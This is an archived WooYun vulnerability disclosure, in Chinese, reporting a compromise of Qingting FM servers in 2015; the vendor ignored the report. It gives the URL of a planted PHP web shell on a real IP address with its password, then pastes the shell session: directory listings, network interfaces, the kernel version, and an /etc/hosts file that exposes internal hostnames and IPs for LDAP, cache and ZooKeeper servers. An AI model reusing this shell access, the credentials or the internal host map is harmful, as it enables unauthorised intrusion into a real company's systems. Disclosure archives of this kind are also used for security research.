乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-18: 细节已通知厂商并且等待厂商处理中 2015-05-23: 厂商已经主动忽略漏洞,细节向公众公开
...
蜻蜓fm每天习惯看公开漏洞 就发现了http://cms.qingting.fm/ 115.29.168.119shell地址:http://115.29.168.119/phpsso_server/uploadfile/avatar/1/1/1/3333/22.php PW:cmd
[*] 基本信息 [ Linux tair-cache2 3.2.0-29-generic #46-Ubuntu SMP Fri Jul 27 17:03:23 UTC 2012 x86_64(www-data) ][/]$ ls -altotal 92drwxr-xr-x 24 root root 4096 Nov 25 17:24 .drwxr-xr-x 24 root root 4096 Nov 25 17:24 ..drwxr-xr-x 2 root root 4096 Aug 14 2012 bindrwxr-xr-x 3 root root 4096 Aug 14 2012 bootdrwxr-xr-x 3 root root 4096 Nov 25 16:58 datadrwxr-xr-x 13 root root 3920 Aug 22 2014 devdrwxr-xr-x 94 root root 4096 Nov 25 17:46 etcdrwxr-xr-x 6 root root 4096 Aug 4 2014 homelrwxrwxrwx 1 root root 33 Aug 14 2012 initrd.img -> /boot/initrd.img-3.2.0-29-genericdrwxr-xr-x 18 root root 4096 Oct 11 2013 libdrwxr-xr-x 2 root root 4096 Oct 11 2013 lib64drwx------ 2 root root 16384 Aug 6 2012 lost+founddrwxr-xr-x 3 root root 4096 Aug 6 2012 mediadrwxr-xr-x 6 root root 4096 Aug 22 2014 mntdrwxr-xr-x 4 root root 4096 Nov 25 17:22 optdr-xr-xr-x 92 root root 0 Jul 12 2014 procdrwx------ 7 root root 4096 May 7 17:32 rootdrwxr-xr-x 17 root root 620 May 7 17:31 rundrwxr-xr-x 2 root root 4096 Oct 11 2013 sbindrwxr-xr-x 2 root root 4096 Mar 6 2012 selinuxdrwxr-xr-x 8 root root 4096 Feb 21 2014 srvdrwxr-xr-x 13 root root 0 Jul 12 2014 sysdrwxrwxrwt 4 root root 4096 May 17 21:46 tmpdrwxr-xr-x 10 root root 4096 Aug 6 2012 usrdrwxr-xr-x 12 root root 4096 Jul 11 2014 varlrwxrwxrwx 1 root root 29 Aug 14 2012 vmlinuz -> boot/vmlinuz-3.2.0-29-generic[/]$ ifconfigeth0 Link encap:Ethernet HWaddr 00:16:3e:00:00:79 inet addr:10.161.160.154 Bcast:10.161.175.255 Mask:255.255.240.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:78525121850 errors:0 dropped:0 overruns:0 frame:0 TX packets:59586094348 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:7717644743701 (7.7 TB) TX bytes:8608882769850 (8.6 TB) Interrupt:79 eth1 Link encap:Ethernet HWaddr 00:16:3e:00:00:7a inet addr:115.29.168.119 Bcast:115.29.171.255 Mask:255.255.252.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3385845258 errors:0 dropped:0 overruns:0 frame:0 TX packets:1555647032 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:178045428627 (178.0 GB) TX bytes:104083414530 (104.0 GB) Interrupt:80 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:29569487305 errors:0 dropped:0 overruns:0 frame:0 TX packets:29569487305 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:5492121412970 (5.4 TB) TX bytes:5492121412970 (5.4 TB)[/]$ uname -aLinux tair-cache2 3.2.0-29-generic #46-Ubuntu SMP Fri Jul 27 17:03:23 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux[/]$ cat /etc/hosts127.0.0.1 localhost127.0.1.1 ubuntu# The following lines are desirable for IPv6 capable hosts::1 ip6-localhost ip6-loopbackfe00::0 ip6-localnetff00::0 ip6-mcastprefixff02::1 ip6-allnodesff02::2 ip6-allrouters42.121.18.19 ldap.qingting.fm10.160.3.201 tair110.160.3.202 tair210.200.113.236 tair310.200.113.233 tair410.200.113.237 tair510.200.113.234 tair610.161.160.153 tair-cache110.161.160.154 tair-cache210.132.11.47 zk110.132.20.38 zk2[/]$
ok 排查吧
···
运维加强.
危害等级:无影响厂商忽略
忽略时间:2015-05-23 09:18
漏洞Rank:2 (WooYun评价)
暂无